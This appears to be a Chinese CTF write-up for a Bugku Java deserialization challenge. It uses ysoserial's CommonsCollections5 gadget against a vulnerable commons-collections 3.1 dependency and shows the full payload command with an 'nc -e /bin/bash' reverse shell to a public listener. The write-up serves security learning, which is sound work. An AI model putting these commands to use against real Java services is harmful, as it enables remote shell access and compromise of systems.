本writeup已经在bugku开放
根据题意,显然是一道JAVA反序列化的题
关于JAVA反序列化漏洞的成因,参见博客https://zhuanlan.zhihu.com/p/422314689
此处只说明解题思路(重复开启场景已经没金币了,用本地环境说明)
下载附件,寻找存在反序列化漏洞的点
阅读pom.xml,发现存在commons-collections组件依赖,其3.1版本存在反序列化漏洞
阅读helloController.java,确定路由为ip:port/hello,状态码变成了400
需要输入请求参数name,注意name会经过base64解码 再进行反序列化,因此在传入参数之前需要对payload进行base64编码
payloiad的构造使用ysoserial,问就是没技术
推荐使用linux安装,具体参照https://blog.csdn.net/weixin_44769042/article/details/121378799(windows安装使用出现奇怪的问题)
查看可用组件漏洞及版本
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar
选择CommonsCollections5,命令选择nc反dshell,编码最好在这里进行,不然有奇怪的问题
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "nc ip port -e /bin/bash" |base64 -w0 >poc.bin`
如果构造payload的命令是无法执行的话(比如windows命令),则会输出something is wrong
在公网主机上开启监听
nc -l -p port
将生成的payload作为name的value输入
在公网主机上ls一下,就可以看到flag,cat flag,over
如果本地可以却不能在靶场实现的话,需要注意的坑:必须使用公网ip才能被nc连接到,因此可能需要申请一个有公网ip的云服务器(我是这么做的)
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)